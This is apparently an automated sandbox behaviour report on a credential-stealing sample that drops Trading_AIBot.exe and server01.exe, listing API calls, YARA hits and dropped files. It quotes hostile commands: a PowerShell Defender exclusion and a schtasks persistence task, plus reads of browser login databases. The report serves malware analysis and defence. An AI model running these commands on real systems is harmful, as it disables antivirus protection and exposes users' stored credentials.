                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 6616Thread sleep time: -265080000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeThread delayed: delay time: 60000Jump to behavior
                              Source: server01.exe, 00000003.00000002.3476964338.0000000000A22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040CE09
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_0040ADB0 GetProcessHeap,HeapFree,1_2_0040ADB0
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040CE09
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040E61C
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00416F6A
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_004123F1 SetUnhandledExceptionFilter,1_2_004123F1
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: server01.exe.1.dr, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                              Source: server01.exe.1.dr, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                              Source: server01.exe.1.dr, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess created: C:\Users\user\AppData\Local\Temp\server01.exe "C:\Users\user\AppData\Local\Temp\server01.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:44 /du 23:59 /sc daily /ri 1 /fJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: GetLocaleInfoA,1_2_00417A20
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeQueries volume information: C:\Users\user\AppData\Local\Temp\server01.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_00412A15
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Stealing of Sensitive Information

                              barindex
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.35bde10.9.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.358ddc0.11.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 3.0.server01.exe.4e0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.35bde10.9.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.35a5df0.8.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.358ddc0.11.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.35a5df0.8.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000003.00000000.2240972319.00000000004E2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.2245104085.0000000003575000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: F7Xu8bRnXT.exe PID: 7092, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: server01.exe PID: 2200, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.34f5570.6.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.3534590.7.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.4ab0000.12.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.5110000.14.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.3.F7Xu8bRnXT.exe.5e7398.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.2254106.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.225500e.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.34f5570.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.4ab0f08.13.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.2254106.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.225500e.2.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.4ab0f08.13.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.3.F7Xu8bRnXT.exe.5e7398.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.4ab0000.12.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.5110000.14.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.34f6478.10.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.34f6478.10.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.3534590.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000001.00000002.2245104085.00000000034F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.2245341110.0000000004AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.2244099849.0000000002214000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000003.2221472933.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.2245462797.0000000005110000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.35bde10.9.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.358ddc0.11.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 3.0.server01.exe.4e0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.35bde10.9.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.35a5df0.8.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.358ddc0.11.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.35a5df0.8.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000003.00000000.2240972319.00000000004E2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.2245104085.0000000003575000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: F7Xu8bRnXT.exe PID: 7092, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: server01.exe PID: 2200, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.35bde10.9.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.358ddc0.11.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 3.0.server01.exe.4e0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.35bde10.9.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.35a5df0.8.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.358ddc0.11.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.35a5df0.8.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000003.00000000.2240972319.00000000004E2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.2245104085.0000000003575000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000002.3486443994.0000000002944000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: F7Xu8bRnXT.exe PID: 7092, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: server01.exe PID: 2200, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED

                              Remote Access Functionality

                              barindex
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.35bde10.9.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.358ddc0.11.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 3.0.server01.exe.4e0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.35bde10.9.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.35a5df0.8.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.358ddc0.11.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.35a5df0.8.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000003.00000000.2240972319.00000000004E2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.2245104085.0000000003575000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: F7Xu8bRnXT.exe PID: 7092, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: server01.exe PID: 2200, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.34f5570.6.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.3534590.7.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.4ab0000.12.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.5110000.14.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.3.F7Xu8bRnXT.exe.5e7398.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.2254106.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.225500e.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.34f5570.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.4ab0f08.13.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.2254106.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.225500e.2.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.4ab0f08.13.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.3.F7Xu8bRnXT.exe.5e7398.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.4ab0000.12.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.5110000.14.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.34f6478.10.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.34f6478.10.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.3534590.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000001.00000002.2245104085.00000000034F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.2245341110.0000000004AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.2244099849.0000000002214000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000003.2221472933.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.2245462797.0000000005110000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
